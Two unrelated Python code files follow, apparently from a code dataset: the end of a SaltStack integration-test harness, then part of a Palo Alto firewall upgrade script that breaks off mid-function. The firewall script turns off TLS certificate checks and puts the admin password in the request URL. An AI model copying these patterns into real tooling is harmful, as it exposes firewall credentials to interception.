os.path.join(TMP_CONF_DIR, entry)
)
for entry in ('master', 'minion', 'sub_minion', 'syndic', 'syndic_master'):
computed_config = copy.deepcopy(locals()['{0}_opts'.format(entry)])
salt.utils.fopen(os.path.join(TMP_CONF_DIR, entry), 'w').write(
yaml.dump(computed_config, default_flow_style=False)
)
sub_minion_computed_config = copy.deepcopy(sub_minion_opts)
salt.utils.fopen(os.path.join(TMP_SUB_MINION_CONF_DIR, 'minion'), 'w').write(
yaml.dump(sub_minion_computed_config, default_flow_style=False)
)
shutil.copyfile(os.path.join(TMP_CONF_DIR, 'master'), os.path.join(TMP_SUB_MINION_CONF_DIR, 'master'))
syndic_master_computed_config = copy.deepcopy(syndic_master_opts)
salt.utils.fopen(os.path.join(TMP_SYNDIC_MASTER_CONF_DIR, 'master'), 'w').write(
yaml.dump(syndic_master_computed_config, default_flow_style=False)
)
syndic_computed_config = copy.deepcopy(syndic_opts)
salt.utils.fopen(os.path.join(TMP_SYNDIC_MINION_CONF_DIR, 'minion'), 'w').write(
yaml.dump(syndic_computed_config, default_flow_style=False)
)
shutil.copyfile(os.path.join(TMP_CONF_DIR, 'master'), os.path.join(TMP_SYNDIC_MINION_CONF_DIR, 'master'))
# <---- Transcribe Configuration -----------------------------------------------------------------------------
# ----- Verify Environment ---------------------------------------------------------------------------------->
master_opts = salt.config.master_config(os.path.join(TMP_CONF_DIR, 'master'))
minion_opts = salt.config.minion_config(os.path.join(TMP_CONF_DIR, 'minion'))
syndic_opts = salt.config.syndic_config(
os.path.join(TMP_SYNDIC_MINION_CONF_DIR, 'master'),
os.path.join(TMP_SYNDIC_MINION_CONF_DIR, 'minion'),
)
sub_minion_opts = salt.config.minion_config(os.path.join(TMP_SUB_MINION_CONF_DIR, 'minion'))
syndic_master_opts = salt.config.master_config(os.path.join(TMP_SYNDIC_MASTER_CONF_DIR, 'master'))
RUNTIME_CONFIGS['master'] = freeze(master_opts)
RUNTIME_CONFIGS['minion'] = freeze(minion_opts)
RUNTIME_CONFIGS['syndic'] = freeze(syndic_opts)
RUNTIME_CONFIGS['sub_minion'] = freeze(sub_minion_opts)
RUNTIME_CONFIGS['syndic_master'] = freeze(syndic_master_opts)
verify_env([os.path.join(master_opts['pki_dir'], 'minions'),
os.path.join(master_opts['pki_dir'], 'minions_pre'),
os.path.join(master_opts['pki_dir'], 'minions_rejected'),
os.path.join(master_opts['pki_dir'], 'minions_denied'),
os.path.join(master_opts['cachedir'], 'jobs'),
os.path.join(master_opts['cachedir'], 'raet'),
os.path.join(master_opts['root_dir'], 'cache', 'tokens'),
os.path.join(syndic_master_opts['pki_dir'], 'minions'),
os.path.join(syndic_master_opts['pki_dir'], 'minions_pre'),
os.path.join(syndic_master_opts['pki_dir'], 'minions_rejected'),
os.path.join(syndic_master_opts['cachedir'], 'jobs'),
os.path.join(syndic_master_opts['cachedir'], 'raet'),
os.path.join(syndic_master_opts['root_dir'], 'cache', 'tokens'),
os.path.join(master_opts['pki_dir'], 'accepted'),
os.path.join(master_opts['pki_dir'], 'rejected'),
os.path.join(master_opts['pki_dir'], 'pending'),
os.path.join(syndic_master_opts['pki_dir'], 'accepted'),
os.path.join(syndic_master_opts['pki_dir'], 'rejected'),
os.path.join(syndic_master_opts['pki_dir'], 'pending'),
os.path.join(syndic_master_opts['cachedir'], 'raet'),
os.path.join(minion_opts['pki_dir'], 'accepted'),
os.path.join(minion_opts['pki_dir'], 'rejected'),
os.path.join(minion_opts['pki_dir'], 'pending'),
os.path.join(minion_opts['cachedir'], 'raet'),
os.path.join(sub_minion_opts['pki_dir'], 'accepted'),
os.path.join(sub_minion_opts['pki_dir'], 'rejected'),
os.path.join(sub_minion_opts['pki_dir'], 'pending'),
os.path.join(sub_minion_opts['cachedir'], 'raet'),
os.path.dirname(master_opts['log_file']),
minion_opts['extension_modules'],
sub_minion_opts['extension_modules'],
sub_minion_opts['pki_dir'],
master_opts['sock_dir'],
syndic_master_opts['sock_dir'],
sub_minion_opts['sock_dir'],
minion_opts['sock_dir'],
TMP_STATE_TREE,
TMP_PRODENV_STATE_TREE,
TMP,
],
running_tests_user)
cls.master_opts = master_opts
cls.minion_opts = minion_opts
cls.sub_minion_opts = sub_minion_opts
cls.syndic_opts = syndic_opts
cls.syndic_master_opts = syndic_master_opts
# <---- Verify Environment -----------------------------------------------------------------------------------
def __exit__(self, type, value, traceback):
'''
Kill the minion and master processes
'''
self.sub_minion_process.terminate()
self.minion_process.terminate()
self.master_process.terminate()
try:
self.syndic_process.terminate()
except AttributeError:
pass
try:
self.smaster_process.terminate()
except AttributeError:
pass
#salt.utils.process.clean_proc(self.sub_minion_process, wait_for_kill=50)
#self.sub_minion_process.join()
#salt.utils.process.clean_proc(self.minion_process, wait_for_kill=50)
#self.minion_process.join()
#salt.utils.process.clean_proc(self.master_process, wait_for_kill=50)
#self.master_process.join()
#try:
# salt.utils.process.clean_proc(self.syndic_process, wait_for_kill=50)
# self.syndic_process.join()
#except AttributeError:
# pass
#try:
# salt.utils.process.clean_proc(self.smaster_process, wait_for_kill=50)
# self.smaster_process.join()
#except AttributeError:
# pass
self.log_server.server_close()
self.log_server.shutdown()
self._exit_mockbin()
self._exit_ssh()
self.log_server_process.join()
# Shutdown the multiprocessing logging queue listener
salt_log_setup.shutdown_multiprocessing_logging()
salt_log_setup.shutdown_multiprocessing_logging_listener()
def pre_setup_minions(self):
'''
Subclass this method for additional minion setups.
'''
def setup_minions(self):
'''
Minions setup routines
'''
def post_setup_minions(self):
'''
Subclass this method to execute code after the minions have been setup
'''
def _enter_mockbin(self):
path = os.environ.get('PATH', '')
path_items = path.split(os.pathsep)
if MOCKBIN not in path_items:
path_items.insert(0, MOCKBIN)
os.environ['PATH'] = os.pathsep.join(path_items)
def _exit_ssh(self):
if hasattr(self, 'sshd_process'):
try:
self.sshd_process.kill()
except OSError as exc:
if exc.errno != 3:
raise
with salt.utils.fopen(self.sshd_pidfile) as fhr:
try:
os.kill(int(fhr.read()), signal.SIGKILL)
except OSError as exc:
if exc.errno != 3:
raise
def _exit_mockbin(self):
path = os.environ.get('PATH', '')
path_items = path.split(os.pathsep)
try:
path_items.remove(MOCKBIN)
except ValueError:
pass
os.environ['PATH'] = os.pathsep.join(path_items)
@classmethod
def clean(cls):
'''
Clean out the tmp files
'''
def remove_readonly(func, path, excinfo):
os.chmod(path, stat.S_IWRITE)
func(path)
for dirname in (TMP, TMP_STATE_TREE, TMP_PRODENV_STATE_TREE):
if os.path.isdir(dirname):
shutil.rmtree(dirname, onerror=remove_readonly)
def wait_for_jid(self, targets, jid, timeout=120):
time.sleep(1) # Allow some time for minions to accept jobs
now = datetime.now()
expire = now + timedelta(seconds=timeout)
job_finished = False
while now <= expire:
running = self.__client_job_running(targets, jid)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
if not running and job_finished is False:
# Let's not have false positives and wait one more seconds
job_finished = True
elif not running and job_finished is True:
return True
elif running and job_finished is True:
job_finished = False
if job_finished is False:
sys.stdout.write(
' * {LIGHT_YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
'{0}'.format(expire - now).rsplit('.', 1)[0],
', '.join(running),
**self.colors
)
)
sys.stdout.flush()
time.sleep(1)
now = datetime.now()
else: # pylint: disable=W0120
sys.stdout.write(
'\n {LIGHT_RED}*{ENDC} ERROR: Failed to get information '
'back\n'.format(**self.colors)
)
sys.stdout.flush()
return False
def __client_job_running(self, targets, jid):
running = self.client.cmd(
list(targets), 'saltutil.running', expr_form='list'
)
return [
k for (k, v) in six.iteritems(running) if v and v[0]['jid'] == jid
]
def wait_for_minion_connections(self, targets, timeout):
salt.utils.appendproctitle('WaitForMinionConnections')
sys.stdout.write(
' {LIGHT_BLUE}*{ENDC} Waiting at most {0} for minions({1}) to '
'connect back\n'.format(
(timeout > 60 and
timedelta(seconds=timeout) or
'{0} secs'.format(timeout)),
', '.join(targets),
**self.colors
)
)
sys.stdout.flush()
expected_connections = set(targets)
now = datetime.now()
expire = now + timedelta(seconds=timeout)
while now <= expire:
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
'{0}'.format(expire - now).rsplit('.', 1)[0],
', '.join(expected_connections),
**self.colors
)
)
sys.stdout.flush()
try:
responses = self.client.cmd(
list(expected_connections), 'test.ping', expr_form='list',
)
# we'll get this exception if the master process hasn't finished starting yet
except SaltClientError:
time.sleep(0.1)
now = datetime.now()
continue
for target in responses:
if target not in expected_connections:
# Someone(minion) else "listening"?
continue
expected_connections.remove(target)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns',
PNUM)
)
)
sys.stdout.write(
' {LIGHT_GREEN}*{ENDC} {0} connected.\n'.format(
target, **self.colors
)
)
sys.stdout.flush()
if not expected_connections:
return
time.sleep(1)
now = datetime.now()
else: # pylint: disable=W0120
print(
'\n {LIGHT_RED}*{ENDC} WARNING: Minions failed to connect '
'back. Tests requiring them WILL fail'.format(**self.colors)
)
try:
print_header(
'=', sep='=', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('=', sep='=', inline=True)
raise SystemExit()
def sync_minion_modules_(self, modules_kind, targets, timeout=None):
if not timeout:
timeout = 120
# Let's sync all connected minions
print(
' {LIGHT_BLUE}*{ENDC} Syncing minion\'s {1} '
'(saltutil.sync_{1})'.format(
', '.join(targets),
modules_kind,
**self.colors
)
)
syncing = set(targets)
jid_info = self.client.run_job(
list(targets), 'saltutil.sync_{0}'.format(modules_kind),
expr_form='list',
timeout=999999999999999,
)
if self.wait_for_jid(targets, jid_info['jid'], timeout) is False:
print(
' {LIGHT_RED}*{ENDC} WARNING: Minions failed to sync {0}. '
'Tests requiring these {0} WILL fail'.format(
modules_kind, **self.colors)
)
raise SystemExit()
while syncing:
rdata = self.client.get_full_returns(jid_info['jid'], syncing, 1)
if rdata:
for name, output in six.iteritems(rdata):
if not output['ret']:
# Already synced!?
syncing.remove(name)
continue
if isinstance(output['ret'], six.string_types):
# An errors has occurred
print(
' {LIGHT_RED}*{ENDC} {0} Failed to sync {2}: '
'{1}'.format(
name, output['ret'],
modules_kind,
**self.colors)
)
return False
print(
' {LIGHT_GREEN}*{ENDC} Synced {0} {2}: '
'{1}'.format(
name,
', '.join(output['ret']),
modules_kind, **self.colors
)
)
# Synced!
try:
syncing.remove(name)
except KeyError:
print(
' {LIGHT_RED}*{ENDC} {0} already synced??? '
'{1}'.format(name, output, **self.colors)
)
return True
def sync_minion_states(self, targets, timeout=None):
salt.utils.appendproctitle('SyncMinionStates')
self.sync_minion_modules_('states', targets, timeout=timeout)
def sync_minion_modules(self, targets, timeout=None):
salt.utils.appendproctitle('SyncMinionModules')
self.sync_minion_modules_('modules', targets, timeout=timeout)
def sync_minion_grains(self, targets, timeout=None):
self.sync_minion_modules_('grains', targets, timeout=timeout)
class AdaptedConfigurationTestCaseMixIn(object):
__slots__ = ()
def get_config(self, config_for, from_scratch=False):
if from_scratch:
if config_for in ('master', 'syndic_master'):
return salt.config.master_config(self.get_config_file_path(config_for))
elif config_for in ('minion', 'sub_minion'):
return salt.config.minion_config(self.get_config_file_path(config_for))
elif config_for in ('syndic',):
return salt.config.syndic_config(
self.get_config_file_path(config_for),
self.get_config_file_path('minion')
)
elif config_for == 'client_config':
return salt.config.client_config(self.get_config_file_path('master'))
if config_for not in RUNTIME_CONFIGS:
if config_for in ('master', 'syndic_master'):
RUNTIME_CONFIGS[config_for] = freeze(
salt.config.master_config(self.get_config_file_path(config_for))
)
elif config_for in ('minion', 'sub_minion'):
RUNTIME_CONFIGS[config_for] = freeze(
salt.config.minion_config(self.get_config_file_path(config_for))
)
elif config_for in ('syndic',):
RUNTIME_CONFIGS[config_for] = freeze(
salt.config.syndic_config(
self.get_config_file_path(config_for),
self.get_config_file_path('minion')
)
)
elif config_for == 'client_config':
RUNTIME_CONFIGS[config_for] = freeze(
salt.config.client_config(self.get_config_file_path('master'))
)
return RUNTIME_CONFIGS[config_for]
def get_config_dir(self):
return TMP_CONF_DIR
def get_config_file_path(self, filename):
if filename == 'syndic_master':
return os.path.join(TMP_SYNDIC_MASTER_CONF_DIR, 'master')
if filename == 'syndic':
return os.path.join(TMP_SYNDIC_MINION_CONF_DIR, 'minion')
if filename == 'sub_minion':
return os.path.join(TMP_SUB_MINION_CONF_DIR, 'minion')
return os.path.join(TMP_CONF_DIR, filename)
@property
def master_opts(self):
'''
Return the options used for the master
'''
return self.get_config('master')
class SaltMinionEventAssertsMixIn(object):
'''
Asserts to verify that a given event was seen
'''
def __new__(cls, *args, **kwargs):
# We have to cross-call to re-gen a config
cls.q = multiprocessing.Queue()
cls.fetch_proc = multiprocessing.Process(target=cls._fetch, args=(cls.q,))
cls.fetch_proc.start()
return object.__new__(cls)
@staticmethod
def _fetch(q):
'''
Collect events and store them
'''
def _clean_queue():
print('Cleaning queue!')
while not q.empty():
queue_item = q.get()
queue_item.task_done()
atexit.register(_clean_queue)
a_config = AdaptedConfigurationTestCaseMixIn()
event = salt.utils.event.get_event('minion', sock_dir=a_config.get_config('minion')['sock_dir'], opts=a_config.get_config('minion'))
while True:
try:
events = event.get_event(full=False)
except Exception:
# This is broad but we'll see all kinds of issues right now
# if we drop the proc out from under the socket while we're reading
pass
q.put(events)
def assertMinionEventFired(self, tag):
#TODO
raise salt.exceptions.NotImplemented('assertMinionEventFired() not implemented')
def assertMinionEventReceived(self, desired_event):
queue_wait = 5 # 2.5s
while self.q.empty():
time.sleep(0.5) # Wait for events to be pushed into the queue
queue_wait -= 1
if queue_wait <= 0:
raise AssertionError('Queue wait timer expired')
while not self.q.empty(): # This is not thread-safe and may be inaccurate
event = self.q.get()
if isinstance(event, dict):
event.pop('_stamp')
if desired_event == event:
self.fetch_proc.terminate()
return True
self.fetch_proc.terminate()
raise AssertionError('Event {0} was not received by minion'.format(desired_event))
class SaltClientTestCaseMixIn(AdaptedConfigurationTestCaseMixIn):
_salt_client_config_file_name_ = 'master'
__slots__ = ()
@property
def client(self):
if 'runtime_client' not in RUNTIME_CONFIGS:
RUNTIME_CONFIGS['runtime_client'] = salt.client.get_local_client(
mopts=self.get_config(self._salt_client_config_file_name_, from_scratch=True)
)
return RUNTIME_CONFIGS['runtime_client']
class ModuleCase(TestCase, SaltClientTestCaseMixIn):
'''
Execute a module function
'''
def minion_run(self, _function, *args, **kw):
'''
Run a single salt function on the 'minion' target and condition
the return down to match the behavior of the raw function call
'''
return self.run_function(_function, args, **kw)
def run_function(self, function, arg=(), minion_tgt='minion', timeout=25,
**kwargs):
'''
Run a single salt function and condition the return down to match the
behavior of the raw function call
'''
know_to_return_none = (
'file.chown', 'file.chgrp', 'ssh.recv_known_host'
)
orig = self.client.cmd(
minion_tgt, function, arg, timeout=timeout, kwarg=kwargs
)
if minion_tgt not in orig:
self.skipTest(
'WARNING(SHOULD NOT HAPPEN #1935): Failed to get a reply '
'from the minion \'{0}\'. Command output: {1}'.format(
minion_tgt, orig
)
)
elif orig[minion_tgt] is None and function not in know_to_return_none:
self.skipTest(
'WARNING(SHOULD NOT HAPPEN #1935): Failed to get \'{0}\' from '
'the minion \'{1}\'. Command output: {2}'.format(
function, minion_tgt, orig
)
)
# Try to match stalled state functions
orig[minion_tgt] = self._check_state_return(
orig[minion_tgt]
)
return orig[minion_tgt]
def run_state(self, function, **kwargs):
'''
Run the state.single command and return the state return structure
'''
ret = self.run_function('state.single', [function], **kwargs)
return self._check_state_return(ret)
@property
def minion_opts(self):
'''
Return the options used for the minion
'''
return self.get_config('minion')
@property
def sub_minion_opts(self):
'''
Return the options used for the sub_minion
'''
return self.get_config('sub_minion')
def _check_state_return(self, ret):
if isinstance(ret, dict):
# This is the supposed return format for state calls
return ret
if isinstance(ret, list):
jids = []
# These are usually errors
for item in ret[:]:
if not isinstance(item, six.string_types):
# We don't know how to handle this
continue
match = STATE_FUNCTION_RUNNING_RE.match(item)
if not match:
# We don't know how to handle this
continue
jid = match.group('jid')
if jid in jids:
continue
jids.append(jid)
job_data = self.run_function(
'saltutil.find_job', [jid]
)
job_kill = self.run_function('saltutil.kill_job', [jid])
msg = (
'A running state.single was found causing a state lock. '
'Job details: \'{0}\' Killing Job Returned: \'{1}\''.format(
job_data, job_kill
)
)
ret.append('[TEST SUITE ENFORCED]{0}'
'[/TEST SUITE ENFORCED]'.format(msg))
return ret
class SyndicCase(TestCase, SaltClientTestCaseMixIn):
'''
Execute a syndic based execution test
'''
_salt_client_config_file_name_ = 'syndic_master'
def run_function(self, function, arg=()):
'''
Run a single salt function and condition the return down to match the
behavior of the raw function call
'''
orig = self.client.cmd('minion', function, arg, timeout=25)
if 'minion' not in orig:
self.skipTest(
'WARNING(SHOULD NOT HAPPEN #1935): Failed to get a reply '
'from the minion. Command output: {0}'.format(orig)
)
return orig['minion']
class ShellCase(AdaptedConfigurationTestCaseMixIn, ShellTestCase, ScriptPathMixin):
'''
Execute a test for a shell command
'''
_code_dir_ = CODE_DIR
_script_dir_ = SCRIPT_DIR
_python_executable_ = PYEXEC
def chdir(self, dirname):
try:
os.chdir(dirname)
except OSError:
os.chdir(INTEGRATION_TEST_DIR)
def run_salt(self, arg_str, with_retcode=False, catch_stderr=False):
'''
Execute salt
'''
arg_str = '-c {0} {1}'.format(self.get_config_dir(), arg_str)
return self.run_script('salt', arg_str, with_retcode=with_retcode, catch_stderr=catch_stderr)
def run_ssh(self, arg_str, with_retcode=False, catch_stderr=False):
'''
Execute salt-ssh
'''
arg_str = '-W -c {0} -i --priv {1} --roster-file {2} --out=json localhost {3}'.format(self.get_config_dir(), os.path.join(TMP_CONF_DIR, 'key_test'), os.path.join(TMP_CONF_DIR, 'roster'), arg_str)
return self.run_script('salt-ssh', arg_str, with_retcode=with_retcode, catch_stderr=catch_stderr, raw=True)
def run_run(self, arg_str, with_retcode=False, catch_stderr=False, async=False, timeout=60, config_dir=None):
'''
Execute salt-run
'''
arg_str = '-c {0}{async_flag} -t {timeout} {1}'.format(config_dir or self.get_config_dir(),
arg_str,
timeout=timeout,
async_flag=' --async' if async else '')
return self.run_script('salt-run', arg_str, with_retcode=with_retcode, catch_stderr=catch_stderr)
def run_run_plus(self, fun, options='', *arg, **kwargs):
'''
Execute Salt run and the salt run function and return the data from
each in a dict
'''
ret = {}
ret['out'] = self.run_run(
'{0} {1} {2}'.format(options, fun, ' '.join(arg)), catch_stderr=kwargs.get('catch_stderr', None)
)
opts = {}
opts.update(self.get_config('master'))
opts.update({'doc': False, 'fun': fun, 'arg': arg})
with RedirectStdStreams():
runner = salt.runner.Runner(opts)
ret['fun'] = runner.run()
return ret
def run_key(self, arg_str, catch_stderr=False, with_retcode=False):
'''
Execute salt-key
'''
arg_str = '-c {0} {1}'.format(self.get_config_dir(), arg_str)
return self.run_script(
'salt-key',
arg_str,
catch_stderr=catch_stderr,
with_retcode=with_retcode
)
def run_cp(self, arg_str, with_retcode=False, catch_stderr=False):
'''
Execute salt-cp
'''
arg_str = '--config-dir {0} {1}'.format(self.get_config_dir(), arg_str)
return self.run_script('salt-cp', arg_str, with_retcode=with_retcode, catch_stderr=catch_stderr)
def run_call(self, arg_str, with_retcode=False, catch_stderr=False):
'''
Execute salt-call.
'''
arg_str = '--config-dir {0} {1}'.format(self.get_config_dir(), arg_str)
return self.run_script('salt-call', arg_str, with_retcode=with_retcode, catch_stderr=catch_stderr)
def run_cloud(self, arg_str, catch_stderr=False, timeout=None):
'''
Execute salt-cloud
'''
arg_str = '-c {0} {1}'.format(self.get_config_dir(), arg_str)
return self.run_script('salt-cloud', arg_str, catch_stderr, timeout)
class ShellCaseCommonTestsMixIn(CheckShellBinaryNameAndVersionMixIn):
_call_binary_expected_version_ = salt.version.__version__
def test_salt_with_git_version(self):
if getattr(self, '_call_binary_', None) is None:
self.skipTest('\'_call_binary_\' not defined.')
from salt.utils import which
from salt.version import __version_info__, SaltStackVersion
git = which('git')
if not git:
self.skipTest('The git binary is not available')
# Let's get the output of git describe
process = subprocess.Popen(
[git, 'describe', '--tags', '--first-parent', '--match', 'v[0-9]*'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=CODE_DIR
)
out, err = process.communicate()
if process.returncode != 0:
process = subprocess.Popen(
[git, 'describe', '--tags', '--match', 'v[0-9]*'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=CODE_DIR
)
out, err = process.communicate()
if not out:
self.skipTest(
'Failed to get the output of \'git describe\'. '
'Error: \'{0}\''.format(
salt.utils.to_str(err)
)
)
parsed_version = SaltStackVersion.parse(out)
if parsed_version.info < __version_info__:
self.skipTest(
'We\'re likely about to release a new version. This test '
'would fail. Parsed(\'{0}\') < Expected(\'{1}\')'.format(
parsed_version.info, __version_info__
)
)
elif parsed_version.info != __version_info__:
self.skipTest(
'In order to get the proper salt version with the '
'git hash you need to update salt\'s local git '
'tags. Something like: \'git fetch --tags\' or '
'\'git fetch --tags upstream\' if you followed '
'salt\'s contribute documentation. The version '
'string WILL NOT include the git hash.'
)
out = '\n'.join(self.run_script(self._call_binary_, '--version'))
self.assertIn(parsed_version.string, out)
@requires_sshd_server
class SSHCase(ShellCase):
'''
Execute a command via salt-ssh
'''
def _arg_str(self, function, arg):
return '{0} {1}'.format(function, ' '.join(arg))
def run_function(self, function, arg=(), timeout=25, **kwargs):
ret = self.run_ssh(self._arg_str(function, arg))
try:
return json.loads(ret)['localhost']
except Exception:
return ret
class SaltReturnAssertsMixIn(object):
def assertReturnSaltType(self, ret):
try:
self.assertTrue(isinstance(ret, dict))
except AssertionError:
raise AssertionError(
'{0} is not dict. Salt returned: {1}'.format(
type(ret).__name__, ret
)
)
def assertReturnNonEmptySaltType(self, ret):
self.assertReturnSaltType(ret)
try:
self.assertNotEqual(ret, {})
except AssertionError:
raise AssertionError(
'{} is equal to {}. Salt returned an empty dictionary.'
)
def __return_valid_keys(self, keys):
if isinstance(keys, tuple):
# If it's a tuple, turn it into a list
keys = list(keys)
elif isinstance(keys, six.string_types):
# If it's a string, make it a one item list
keys = [keys]
elif not isinstance(keys, list):
# If we've reached here, it's a bad type passed to keys
raise RuntimeError('The passed keys need to be a list')
return keys
def __getWithinSaltReturn(self, ret, keys):
self.assertReturnNonEmptySaltType(ret)
keys = self.__return_valid_keys(keys)
okeys = keys[:]
for part in six.itervalues(ret):
try:
ret_item = part[okeys.pop(0)]
except (KeyError, TypeError):
raise AssertionError(
'Could not get ret{0} from salt\'s return: {1}'.format(
''.join(['[\'{0}\']'.format(k) for k in keys]), part
)
)
while okeys:
try:
ret_item = ret_item[okeys.pop(0)]
except (KeyError, TypeError):
raise AssertionError(
'Could not get ret{0} from salt\'s return: {1}'.format(
''.join(['[\'{0}\']'.format(k) for k in keys]), part
)
)
return ret_item
def assertSaltTrueReturn(self, ret):
try:
self.assertTrue(self.__getWithinSaltReturn(ret, 'result'))
except AssertionError:
log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
try:
raise AssertionError(
'{result} is not True. Salt Comment:\n{comment}'.format(
**(next(six.itervalues(ret)))
)
)
except (AttributeError, IndexError):
raise AssertionError(
'Failed to get result. Salt Returned:\n{0}'.format(
pprint.pformat(ret)
)
)
def assertSaltFalseReturn(self, ret):
try:
self.assertFalse(self.__getWithinSaltReturn(ret, 'result'))
except AssertionError:
log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
try:
raise AssertionError(
'{result} is not False. Salt Comment:\n{comment}'.format(
**(next(six.itervalues(ret)))
)
)
except (AttributeError, IndexError):
raise AssertionError(
'Failed to get result. Salt Returned: {0}'.format(ret)
)
def assertSaltNoneReturn(self, ret):
try:
self.assertIsNone(self.__getWithinSaltReturn(ret, 'result'))
except AssertionError:
log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
try:
raise AssertionError(
'{result} is not None. Salt Comment:\n{comment}'.format(
**(next(six.itervalues(ret)))
)
)
except (AttributeError, IndexError):
raise AssertionError(
'Failed to get result. Salt Returned: {0}'.format(ret)
)
def assertInSaltComment(self, in_comment, ret):
return self.assertIn(
in_comment, self.__getWithinSaltReturn(ret, 'comment')
)
def assertNotInSaltComment(self, not_in_comment, ret):
return self.assertNotIn(
not_in_comment, self.__getWithinSaltReturn(ret, 'comment')
)
def assertSaltCommentRegexpMatches(self, ret, pattern):
return self.assertInSaltReturnRegexpMatches(ret, pattern, 'comment')
def assertInSaltStateWarning(self, in_comment, ret):
return self.assertIn(
in_comment, self.__getWithinSaltReturn(ret, 'warnings')
)
def assertNotInSaltStateWarning(self, not_in_comment, ret):
return self.assertNotIn(
not_in_comment, self.__getWithinSaltReturn(ret, 'warnings')
)
def assertInSaltReturn(self, item_to_check, ret, keys):
return self.assertIn(
item_to_check, self.__getWithinSaltReturn(ret, keys)
)
def assertNotInSaltReturn(self, item_to_check, ret, keys):
return self.assertNotIn(
item_to_check, self.__getWithinSaltReturn(ret, keys)
)
def assertInSaltReturnRegexpMatches(self, ret, pattern, keys=()):
return self.assertRegexpMatches(
self.__getWithinSaltReturn(ret, keys), pattern
)
def assertSaltStateChangesEqual(self, ret, comparison, keys=()):
keys = ['changes'] + self.__return_valid_keys(keys)
return self.assertEqual(
self.__getWithinSaltReturn(ret, keys), comparison
)
def assertSaltStateChangesNotEqual(self, ret, comparison, keys=()):
keys = ['changes'] + self.__return_valid_keys(keys)
return self.assertNotEqual(
self.__getWithinSaltReturn(ret, keys), comparison
)
|
pa_upgrade.py | import sys
import xml.etree.ElementTree as ET
import requests
import csv
import time
import ping3
import getpass
import threading
#Ignores SSL warnings
requests.packages.urllib3.disable_warnings()
#Function to authenticate fw with user/pw provided and obtain the API key
def authenticate(fwip, user, pw):
#Calls the API with specific XPath. Can be found via the Firewall API GUI or CLI
try:
r = requests.post(f"https://{fwip}/api/?type=keygen&user={user}&password={pw}", verify=False)
#Parse XML to be extracted
if r.status_code == 200:
root = ET.fromstring(r.text)
#Takes the value from <result><key><result/><key/> and assigns it to variable
api_key = root.find(".result/key").text
else:
resultWriter.writerow([fwip, "Failed", "Authentication failed"])
sys.exit()
except (ConnectionError, TimeoutError) as e:
resultWriter.writerow([fwip, "Failed", e])
sys.exit()
return api_key
#Does a Check now for software on Firewall
def softwarecheck(fwip, api_key):
#Calls the API with specific XPath. Can be found via the Firewall API GUI or CLI
try:
r = requests.post(
f"https://{fwip}/api/?key={api_key}&type=op&cmd=<request><system><software><check></check></software></system></request>", verify=False)
#Parse XML to be extracted
if r.status_code == 200:
root = ET.fromstring(r.text)
#Create empty list to be appended to
vsn = []
#Finds all versions available after check and appends to list###
for entry in root.findall(".result/sw-updates/versions/entry"):
ver = entry.find("version").text
vsn.append(ver)
#Looks in the list and finds any value that matches the entered version by the user
ifver = any(i in str(vers) for i in vsn)
#If it finds the version requested, it will output the below and continue
if ifver is True:
pass
#If it doesn"t find the version requested, it will output the below and end
else:
resultWriter.writerow([fwip, "Failed", f"Could not find version specified. \nCheck connectivity to update servers and that the firewall supports version: {vers}"])
sys.exit()
else:
resultWriter.writerow([fwip, "Failed", "API call failed, ensure that the firewall ip and api key are correct."])
sys.exit()
except (ConnectionError, TimeoutError) as e:
resultWriter.writerow([fwip, "Failed", e])
sys.exit()
#Initiate the download of the software
def download_software(fwip, api_key, vers):
#Calls the API with specific XPath. Can be found via the Firewall API GUI or CLI
try:
r = requests.post(
f"https://{fwip}/api/?key={api_key}&type=op&cmd=<request><system><software><download><version>{vers}</version></download></software></system></request>", verify=False)
#Parse XML to be extracted
if r.status_code == 200:
root = ET.fromstring(r.text)
#Finds the attribute associated to status
resp = root.attrib
rstat = resp.get("status")
#If it returns success, it will continue the script and wait for the job to finish
if rstat == "success":
#Finds the jobid
for job in root.findall("./result"):
jobid = job.find("job").text
jobstat = "PEND"
#While loop to check the job every 1 minute until job is finished
while jobstat == "PEND":
try:
r = requests.post(f"https://{fwip}/api/?key={api_key}&type=op&cmd=<show><jobs><id>{jobid}</id></jobs></show>", verify=False)
if r.status_code == 200:
root = ET.fromstring(r.text)
for stat in root.findall(".result/job"):
jobstat = stat.find("result").text
time.sleep(60)
except (ConnectionError, TimeoutError) as e:
resultWriter.writerow([fwip, "Failed", e])
sys.exit()
else:
continue
else:
#If the download returns failed, prints the error message and retrys in 1 minute
# TODO: Add a timeout here
time.sleep(60)
download_software(fwip, api_key, vers)
except (ConnectionError, TimeoutError) as e:
resultWriter.writerow([fwip, "Failed", e])
sys.exit()
#Function to initiate install of software
def install_software(fwip, api_key, vers):
#Calls the API with specific XPath. Can be found via the Firewall API GUI or CLI
try:
r = requests.post(
f"https://{fwip}/api/?key={api_key}&type=op&cmd=<request><system><software><install><version>{vers}</version></install></software></system></request>", verify=False)
#Parse XML to be extracted
if r.status_code == 200:
root = ET.fromstring(r.text)
#Finds the attribute associated to status
resp = root.attrib
rstat = resp.get("status")
#If it returns success, it will continue the script and wait for the job to finish
if rstat == "success":
#Finds the jobid
for job in root.findall("./result"):
jobid = job.find("job").text
jobstat = "PEND"
#While loop to check the job every 1 minute until job is finished
while jobstat == "PEND":
try:
r = requests.post(f"https://{fwip}/api/?key={api_key}&type=op&cmd=<show><jobs><id>{jobid}</id></jobs></show>", verify=False)
if r.status_code == 200:
root = ET.fromstring(r.text)
for stat in root.findall(".result/job"):
jobstat = stat.find("result").text
time.sleep(60)
except (ConnectionError, TimeoutError) as e:
resultWriter.writerow([fwip, "Failed", e])
sys.exit()
else:
continue
else:
# TODO: Add a timeout here
time.sleep(60)
install_software(fwip, api_key, vers)
except (ConnectionError, TimeoutError) as e:
